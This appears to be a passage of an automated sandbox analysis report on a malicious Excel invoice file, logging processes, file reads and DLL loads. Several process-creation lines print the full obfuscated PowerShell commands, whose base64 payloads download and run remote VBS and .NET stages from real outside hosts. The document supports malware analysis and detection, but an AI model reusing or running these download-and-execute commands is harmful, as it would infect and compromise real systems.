Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............T.r.u.e...Y.....0.......................0.......8........................3......................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................Y.....}..w......Y......................1......(.P.....@...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................0.......}..w............8.......8.......@"......(.P.....@...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................![.l....}..w....0.......\.......................(.P.....@...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................r.e.s.o.l.v.e.d.:. .'.p.a.s.t.e...e.e.'."..l....8~r.....(.P.....@...............H.......*.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................![.l....}..w....0.......\.......................(.P.....@...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.7.4......X.l....8~r.....(.P.....@...............H.......$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................0.......}..w.............x_......X.l....8~r.....(.P.....@...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................0.......}..w.............x_......X.l....8~r.....(.P.....@...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................0.......}..w.............x_......X.l....8~r.....(.P.....@...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................0.......}..w.............x_......X.l....8~r.....(.P.....@.......................T.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......0.......}..w.............x_......X.l....8~r.....(.P.....@...............H...............................	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: SOA USD67,353.35.xla.xlsx

ReversingLabs: Detection: 15%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5706.tmp" "c:\Users\user\AppData\Local\Temp\l2ioe53r\CSC777882445C184F59ADDE974B4279F6D.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplecookiebiscutwithsweetnessforentir.vbS"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $claustrophobe = 'JGF1dG9zYXZlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGNoZW1vdHJvcGlzbSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHF1ZWVmID0gJGNoZW1vdHJvcGlzbS5Eb3dubG9hZERhdGEoJGF1dG9zYXZlKTskcHVua2xpbmcgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVlZWYpOyR0dWJlcmN1bG9waG9iaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGZlbXRvY291bG9tYiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHVudGhyaWZ0eSA9ICRwdW5rbGluZy5JbmRleE9mKCR0dWJlcmN1bG9waG9iaWEpOyRoYW1tYW0gPSAkcHVua2xpbmcuSW5kZXhPZigkZmVtdG9jb3Vsb21iKTskdW50aHJpZnR5IC1nZSAwIC1hbmQgJGhhbW1hbSAtZ3QgJHVudGhyaWZ0eTskdW50aHJpZnR5ICs9ICR0dWJlcmN1bG9waG9iaWEuTGVuZ3RoOyRwZXRyb2RvbGxhciA9ICRoYW1tYW0gLSAkdW50aHJpZnR5OyRkYXN5YXRpZGFlID0gJHB1bmtsaW5nLlN1YnN0cmluZygkdW50aHJpZnR5LCAkcGV0cm9kb2xsYXIpOyRkaWdpdGFsaXNpbmcgPSAtam9pbiAoJGRhc3lhdGlkYWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGRhc3lhdGlkYWUuTGVuZ3RoKV07JHVuaWRlYWxpemVkID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGlnaXRhbGlzaW5nKTskY29tbWVuZGluZyA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHVuaWRlYWxpemVkKTskamFwb25pY2FzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGphcG9uaWNhcy5JbnZva2UoJG51bGwsIEAoJzAvY3VWREUvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjb25maWRlbnRpYWxpdHknLCAnJGNvbmZpZGVudGlhbGl0eScsICckY29uZmlkZW50aWFsaXR5JywgJ0Nhc1BvbCcsICckY29uZmlkZW50aWFsaXR5JywgJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJzEnLCckY29uZmlkZW50aWFsaXR5JykpOw==';$uninverted = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($claustrophobe));Invoke-Expression $uninverted
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplecookiebiscutwithsweetnessforentir.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5706.tmp" "c:\Users\user\AppData\Local\Temp\l2ioe53r\CSC777882445C184F59ADDE974B4279F6D.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $claustrophobe = 'JGF1dG9zYXZlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGNoZW1vdHJvcGlzbSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHF1ZWVmID0gJGNoZW1vdHJvcGlzbS5Eb3dubG9hZERhdGEoJGF1dG9zYXZlKTskcHVua2xpbmcgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVlZWYpOyR0dWJlcmN1bG9waG9iaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGZlbXRvY291bG9tYiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHVudGhyaWZ0eSA9ICRwdW5rbGluZy5JbmRleE9mKCR0dWJlcmN1bG9waG9iaWEpOyRoYW1tYW0gPSAkcHVua2xpbmcuSW5kZXhPZigkZmVtdG9jb3Vsb21iKTskdW50aHJpZnR5IC1nZSAwIC1hbmQgJGhhbW1hbSAtZ3QgJHVudGhyaWZ0eTskdW50aHJpZnR5ICs9ICR0dWJlcmN1bG9waG9iaWEuTGVuZ3RoOyRwZXRyb2RvbGxhciA9ICRoYW1tYW0gLSAkdW50aHJpZnR5OyRkYXN5YXRpZGFlID0gJHB1bmtsaW5nLlN1YnN0cmluZygkdW50aHJpZnR5LCAkcGV0cm9kb2xsYXIpOyRkaWdpdGFsaXNpbmcgPSAtam9pbiAoJGRhc3lhdGlkYWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGRhc3lhdGlkYWUuTGVuZ3RoKV07JHVuaWRlYWxpemVkID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGlnaXRhbGlzaW5nKTskY29tbWVuZGluZyA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHVuaWRlYWxpemVkKTskamFwb25pY2FzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGphcG9uaWNhcy5JbnZva2UoJG51bGwsIEAoJzAvY3VWREUvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjb25maWRlbnRpYWxpdHknLCAnJGNvbmZpZGVudGlhbGl0eScsICckY29uZmlkZW50aWFsaXR5JywgJ0Nhc1BvbCcsICckY29uZmlkZW50aWFsaXR5JywgJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJzEnLCckY29uZmlkZW50aWFsaXR5JykpOw==';$uninverted = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($claustrophobe));Invoke-Expression $uninverted	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
